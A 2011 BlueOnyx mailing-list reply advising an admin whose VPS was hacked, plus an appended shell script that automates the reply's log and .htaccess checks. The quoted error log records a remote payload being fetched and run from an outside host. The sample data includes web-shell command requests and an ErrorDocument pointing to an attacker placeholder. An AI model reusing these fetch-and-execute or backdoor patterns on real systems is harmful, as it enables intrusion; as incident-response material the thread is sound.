[BlueOnyx:08830] Re: vps hacked
Greg Kuhnert
gkuhnert at compassnetworks.com.au
Thu Oct 13 15:59:52 -05 2011
Hi Steffan.
On 13/10/2011 11:07 PM, Steffan wrote:
> I still have a client with a BlueQuartz server (vps)
> This morning the virtual server was hacked
> I looked in the logs and found this in /var/log/httpd/error_log
I've seen almost identical attacks recently. I saw someone using an old
PHP application (an old copy of creloaded) which contained security
vulnerabilities. This happened on a BlueOnyx server - and due to the
openbasedir restrictions, the damage was restricted to one vsite.
(Thank you Michael for openbasedir integration - it's one of the most
powerful additions in BlueOnyx.)
The bad guys installed a web based tool that allows remote users to
browse the file system, get files etc., and to upload and manipulate
other files. Their next action was to install a web based spam injection
tool, which received spam commands via xml. Check your postmaster inbox
for a higher than normal number of undeliverable messages - this will be
a good indication if they've done this to you.
My suggestion to you for troubleshooting: Look at your access logs. Most
HTTP injections are controlled by POST requests in your web log.
grep POST /var/log/httpd/access_log | cut -d " " -f 1,8 | cut -d "?" -f 1 | sort | uniq -c | sort -nr | less
This command will produce a sorted list of URLs where POST commands are
used on your server, sorted by frequency of use. Look for items that are
unfamiliar to you - particularly those that are getting a lot of hits.
Another hint, one specific to your situation:
ls -l `locate .htaccess`
Look at the dates of the .htaccess files - one or more of them will have
a recent date stamp ... View the file, and you will find where the error
documents are pointing to an external URL. Some older versions of apache
pull this error document externally, and execute the php code on your
system. (Not sure if this is still a problem on BlueQuartz - but it was
ages ago). The bad guys use this so that if you clean up the initial
problem, they still have a backdoor back into your system. The bot in
this case appears to connect back to an IRC server for remote control.
Best of luck cleaning up your server.
Greg.
> [Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
> --00:07:40-- http://rapha.altervista.org/prv.txt
> => `prv.txt'
> Resolving rapha.altervista.org... 46.4.65.68
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 28,039 (27K) [text/plain]
> 0K .......... .......... ....... 100% 1015.53 KB/s
> 00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
> sh: line 1: lwp-downlod: command not found
> sh: line 1: fetch: command not found
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
> % Total % Received % Xferd Average Speed Time Time
> Time Current
> Dload Upload Total Spent
> Left Speed
> ^M 14 28039 14 4097 0 0 98324 0 --:--:-- --:--:--
> --:--:-- 98324^M100 28039 100 28039 0 0 403k 0 --:--:--
> --:--:-- --:--:-- 899k
> sh: line 3: prv.txt: command not found
> --00:07:40-- http://rapha.altervista.org/prv.txt
> => `prv.txt'
> Resolving rapha.altervista.org... 46.4.65.68
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 28,039 (27K) [text/plain]
> 0K .......... .......... ....... 100% 1020.34 KB/s
> 00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]
> sh: line 1: lwp-downlod: command not found
> sh: line 1: fetch: command not found
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
> % Total % Received % Xferd Average Speed Time Time
> Time Current
> Dload Upload Total Spent
> Left Speed
> ^M 4 28039 4 1201 0 0 42493 0 --:--:-- --:--:--
> --:--:-- 42493^M100 28039 100 28039 0 0 507k 0 --:--:--
> --:--:-- --:--:-- 1048k
> sh: line 3: prv.txt: command not found
> I don't see any admin logins
> How can I find out what happened?
> I don't see anything weird in the access log or message log
>
> Thanks, Steffan
>
> _______________________________________________
> Blueonyx mailing list
> Blueonyx at mail.blueonyx.it
> http://mail.blueonyx.it/mailman/listinfo/blueonyx
--
+---------------------------------------------------------------------+
| / \ Greg Kuhnert,gkuhnert at compassnetworks.com.au |
|< o> Compass Networks - Pointing you in the right direction |
| \ / See us for BlueQuartz / BlueOnyx modules and Support. |
+---------------------------------------------------------------------+
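Greg's two checks (the POST-frequency pipeline and the review of .htaccess ErrorDocument directives), as an added example that is not part of the original post or of BlueOnyx: both are wrapped as shell functions and run against constructed sample data. It assumes, as the post's `cut -f 1,8` implies, that access_log lines carry a vhost prefix so that field 8 is the requested URL; for a plain combined log without the vhost column use `-f 1,7`. The host name in the sample .htaccess is a placeholder.

```shell
#!/bin/sh
# Added example, not code from the original post: Greg's two checks wrapped
# as functions and run against a constructed sample so they work offline.
# Assumption (as in the post's cut -f 1,8): access_log lines carry a vhost
# prefix, so field 1 is the vhost and field 8 the requested URL. For a plain
# combined log without the vhost column use -f 1,7 (client IP and URL).

# Build a scratch directory with constructed sample data; prints its path.
setup_sample() {
  d=$(mktemp -d)
  cat > "$d/access_log" <<'EOF'
shop.example.net 203.0.113.5 - - [12/Oct/2011:00:07:10 +0100] "POST /admin/login.php HTTP/1.1" 200 512 "-" "Mozilla"
shop.example.net 203.0.113.5 - - [12/Oct/2011:00:07:11 +0100] "POST /images/x.php?cmd=ls HTTP/1.1" 200 40 "-" "Mozilla"
shop.example.net 203.0.113.5 - - [12/Oct/2011:00:07:12 +0100] "POST /images/x.php?cmd=id HTTP/1.1" 200 40 "-" "Mozilla"
shop.example.net 198.51.100.9 - - [12/Oct/2011:00:08:00 +0100] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla"
shop.example.net 203.0.113.5 - - [12/Oct/2011:00:09:12 +0100] "POST /images/x.php?cmd=uname HTTP/1.1" 200 40 "-" "Mozilla"
EOF
  mkdir -p "$d/site/ok" "$d/site/images"
  # Benign: error document served from the site's own path.
  echo 'ErrorDocument 404 /error/404.html' > "$d/site/ok/.htaccess"
  # Suspicious: error document fetched from an external host (placeholder).
  echo 'ErrorDocument 404 http://attacker-host.invalid/err.txt' > "$d/site/images/.htaccess"
  echo "$d"
}

# POST targets with the query string stripped, counted and sorted by
# frequency (most hits first). Output: "<count> <vhost> <path>" per line.
post_frequency() {
  grep ' "POST ' "$1" | cut -d ' ' -f 1,8 | cut -d '?' -f 1 \
    | sort | uniq -c | sort -nr | awk '{ print $1, $2, $3 }'
}

# .htaccess files under $1 whose ErrorDocument points at an external URL,
# the persistence trick Greg describes. Prints one path per line.
external_errordocs() {
  find "$1" -type f -name .htaccess | while read -r f; do
    if grep -iqE '^[[:space:]]*ErrorDocument[[:space:]]+[0-9]+[[:space:]]+https?://' "$f"; then
      echo "$f"
    fi
  done
}

WORK=$(setup_sample)
echo "== POST targets by frequency (unfamiliar, busy paths are suspicious) =="
post_frequency "$WORK/access_log"
echo "== .htaccess files with an external ErrorDocument (check their dates too) =="
external_errordocs "$WORK/site"
```

On a real server, point `post_frequency` at /var/log/httpd/access_log and `external_errordocs` at the vsite document roots, then `ls -l` the files it reports to compare modification dates, as the post suggests.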